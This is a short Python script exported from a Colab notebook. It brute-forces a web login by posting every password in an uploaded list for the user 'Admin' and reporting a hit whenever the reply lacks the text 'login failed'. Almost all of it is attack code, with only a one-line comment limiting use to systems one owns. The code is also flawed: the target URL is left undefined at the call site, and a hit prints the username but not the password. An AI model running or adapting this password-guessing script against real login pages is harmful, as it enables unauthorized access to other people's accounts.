# -*- coding: utf-8 -*-
"""Password.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1CTZREq4N9IlGBOnr-9IPr5bTdI2zkZG8
"""

import requests

from google.colab import files
uploaded = files.upload()
#select "passwords.txt" from your local machine

def brute_force_login(target_url, username, password_list="passwords.txt"):
  with open(password_list, "r") as file:
   for password in file.readlines():
      password = password.strip()
      data={"username":username,"password":password}
      response=requests.post(target_url,data=data)
      if "login failed"not in response.text:
        print(f"possible credentials found: {username}")
        return
  print("no valid credentials found.")

#use only on systems you own/control!
#target_url="https://www.hackthebox.com/"
brute_force_login(target_url,"Admin")